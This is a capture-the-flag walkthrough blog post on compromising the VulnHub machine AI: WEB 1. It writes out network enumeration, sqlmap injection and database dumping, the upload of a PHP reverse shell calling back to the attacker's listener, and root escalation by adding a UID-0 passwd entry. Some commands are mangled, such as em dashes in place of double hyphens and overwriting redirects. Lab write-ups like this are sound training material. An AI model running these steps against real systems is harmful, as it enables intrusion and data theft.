Pentesting: AI: WEB 1 | Privilege Escalation Attack | Python Reverse Shell | Vulnerabilities | SQL Injection | WriteUp | Walkthrough | VulnHub CTF | Flags
Hello, friends I’m Shams Ul Mehmood and this is my 4th article. This article is a walkthrough of all about AI: WEB: 1 Vulnhub Box. It includes some type of vulnerabilities like SQL Injection, Python Reverse Shell and User Privilege Escalation. You can find this Vulnhub box from here.
Steps:
- Getting the target machine IP address by Netdiscover utility
- Getting open port details by using the Nmap tool
- Enumerating HTTP default Port with Dirb / Gobuster / Nikto utilities
- Exploitation of Sql Injection Vulnerability
- Taking the Python reverse shell and user privilege escalation
Step-1:
📌️ In the first step of the scanning, I used the netdiscover -r commands to perform a Local Network Scan to find out the IP Address of the victim machine.
Command : sudo netdiscover -r 192.168.204.0/24
Step-2:
📌️ In the second step, after getting the victim machine’s IP address now I performed a Nmap scan to my victim. I used,
- -sS : to scan running services.
- -sV : to scan application version.
- -p- : to scan all ports on victim machine.
- -sC : to scan default script.
Command : sudo nmap -sS -p- -sV -sC 192.168.204.136
📌 ️This was an nmap scan of the network to find the IP address of the target machine. I found that the IP address was 192.168.204.136, and I found only a single port 80 which was open.
📌 Now I open the target machine ip address in browser.
Step-3:
📌️ In this step, I used the multiple tools like dirb, gobuster and nikto to enumerate interesting hidden files and directories on this target machine.
Command : sudo dirb http://192.168.204.136
Command : sudo gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://192.168.204.136
Command : nikto -h http://192.168.204.136/m3diNf0/
Command : nikto -h 192.168.204.136
📌 Then in browser search bar I append ‘/robots.txt’ file with victim machine ip address.
📌 Now you can see two parts in robots.txt which were disallow and user-agent.
📌 Now I one-by-one append robots.txt components with the target ip address in browser search bar.
Command : 192.168.204.136/*
Command : 192.168.204.136/m3diNf0/
Command : 192.168.204.136/se3reTdir777/uploads/
📌 But they return status codes errors like 404 (Not Found) and 403 (Forbidden).
📌 Then when I append ‘/m3diNf0/’ and ‘info.php’ with target machine ip address in browser search bar.
📌 When I append “/se3reTdir777" with the victim ip address in browser search bar then I found a form page.
Command : 192.168.204.136/se3reTdir777/
📌 Then I entered some type of user id’s then I get user basic info.
Step-4:
📌 In forth step, I found error-based sql injection vulnerability in this basic web form page by using inverted ‘ in text field.
📌 Then before to launch sql injection exploitation, first I capture the HTTP Requests by using BurpSuite. then save the captured requests in a file then I prefer to start exploitation by using SQLMAP.
📌 Then save the captured requests in ‘attack_request.txt’ file on desktop then I prefer to start exploitation by using SQLMAP.
📌 Then use the following commands,
Command : ls ./Desktop/
Command : sudo sqlmap -r ./Desktop/attack_request.txt
Command : sudo sqlmap -r ./Desktop/attack_request.txt — dbs
Command : sudo sqlmap -r ./Desktop/attack_request.txt -D aiweb1 -T systerUser — columns
Command : sudo sqlmap -r ./Desktop/attack_request.txt -D aiweb1 -T user — columns
Command : sudo sqlmap -r ./Desktop/attack_request.txt -D aiweb1 -T user -C firstName, id, lastName — dump
📌 Now we decrypt the encrypted user passwords by using following commands:
Command : sudo echo RmFrZVVzZXJQYXNzdzByZA== | base64 -d
Command : sudo echo TXlFdmlsUGFzc19mOTA4c2RhZjlfc2FkZmFzZJBzYQ== | base64 -d
Command : sudo echo TjB0VGhpczBuZUFsczA= | base64 -d
Command : sudo sqlmap -r ./Desktop/attack_request.txt — dbs — os-pwn
📌 This task takes a few message prompts so I will try and walk you through it. I had to try a few times before I got it right myself.
📌 I went with the default php language option as we know the site is running php and opted in on the full path disclosure, to start.
📌 This is when things get a little tricky.
📌 With some trial and error, I eventually ended up going back to that info.php file we found earlier to discover a slightly unconventional root directory:
Command : /home/www/html/web1x443290o2sdf92213/
📌 The sqlmap ‘os-pwn’ option uploads a malicious payload, so I appended this strange root directory with our discovered uploads directory and saved it to a text file called ‘directory_listing’ and used it with option 3 in our next prompt.
📌 Before that, first I need to add given payload to directory_listing file in root directory of root user by using below commands.
Payload : /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads
Command : pwd
Command : cd /root
Command : nano /root/directory_listing
📌 Paste the above payload to directory_listing file.
📌 Then enter directory_listing file location.
📌 And just when it looked like we were about to get a reverse tcp connection..
📌 But it is failed!
📌 One of the best things about sqlmap, aside from it automating injection trial and error tasks for you, is it also shows you what it is doing.
Step-5:
📌 In 5th step, when we look back at the logs we see this.
📌 Which reveals a php script with an upload form.
URL : http://192.168.204.136/se3reTdir777/uploads/tmpuanbs.php
📌 Right this makes everything so much easier. We can turn to our favorite php-reverse-shell script, and be good to go.
📌 Now here you can see php-reverse-shell.php
📌 I change the above script to point to my local IP address, 192.168.204.143 and port 1010 for good luck.
📌 I saved the modified copy out as php_script.php.
📌 I then fire up a listener on my local machine by using following command.
Command : nc -lvp 1010
📌 Then browse the php_script.php file in Downloads directory by using upload form.
📌 After select, the php_script.php file with the help of upload form.
📌 The after upload, my file successfuly uploaded.
📌 Ok, now the moment of truth. With our listener still running in the background terminal, we navigate over to php_script.php.
📌 Wow, I have a shell.
📌 Then I was execute following command:
Command : whoami
📌 I used python reverse shell script for tty.
Command : python -c “import pty; pty.spawn(‘/bin/bash’)”
Command : whoami
Command : ls
Command : ls /etc/passwd
📌 Then I wanna show you usernames by using passwd file.
Command : cat /etc/passwd
📌 Here I want to add new multiple usernames to passwd file by using following commands.
Command : echo “root:x:0:0:root:/root:/bin/bash” > passwd
Command : echo “aiweb1pwn:x:0:0:root:/root:/bin/bash” > passwd
Command : echo “cybershark:x:0:0:root:/root:/bin/bash” > passwd
Command : cat passwd
📌 Then I was switched from www-data user to another user aiweb1pwn by using command.
Command : su aiweb1pwn
📌 Then Entered password for aiweb1pwn user.
Password : MyEvilPass_f908sdaf9_sadfasf0sa
Command : whoami
📌 Awesome, I have root-level access to my victim machine.
📌 Then I used the following command to find out required flag.
Command : cd /home/root/
Command : ls
Command : cat flag.txt
CTF Game Over : I am Root!
\( ゚ヮ゚)/🏆 🏆🎯🏅 🚀
📈⭐🧑🎤🎭💯
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⣿⣿⠋⠁⠈⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠁⠈⠙⣿⣿
⣿⣿⡄⠀⠀⠘⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠃⠀⠀⢠⣿⣿
⣿⣿⣿⡀⠀⠀⢹⣿⣿⣿⣿⣿⠟⠉⠀⠀⠉⠻⣿⣿⣿⣿⣿⡏⠀⠀⢀⣿⣿⣿
⣿⣿⣿⣧⠀⠀⠀⢻⣿⣿⣿⡇⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⡟⠀⠀⠀⣼⣿⣿⣿
⣿⣿⣿⣿⡄⠀⠀⠈⢿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⡿⠁⠀⠀⢠⣿⣿⣿⣿
⣿⣿⣿⣿⣷⠀⠀⠀⠈⢿⣿⠀⠀⠀⠀⠀⠀⠀⠀⣿⡿⠁⠀⠀⠀⣾⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣧⠀⠀⠀⠈⢻⡆⠀⠀⠀⠀⠀⠀⢰⡟⠁⠀⠀⠀⣼⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣇⠀⠀⠀⢸⣿⣦⡀⠀⠀⢀⣴⣿⡇⠀⠀⠀⣸⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣦⠀⠀⠈⣇⠸⣿⠒⠒⣿⠇⣸⠁⠀⠀⣴⣿⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⡀⠀⠀⣿⡀⢿⡄⢠⡿⢀⣿⠀⠀⢀⣿⣿⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⡇⠀⠀⠸⣧⠘⣷⣾⠃⣼⠇⠀⠀⢸⣿⣿⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⡇⠀⠀⠀⢹⡶⠛⠛⢶⡏⠀⠀⠀⢸⣿⣿⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⠀⠀⠀⠘⣧⣀⣀⣼⠃⠀⠀⠀⣿⣿⣿⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣶⣶⣶⣶⣶⣿⣿⣶⣶⣶⣶⣶⣿⣿⣿⣿⣿⣿⣿⣿⣿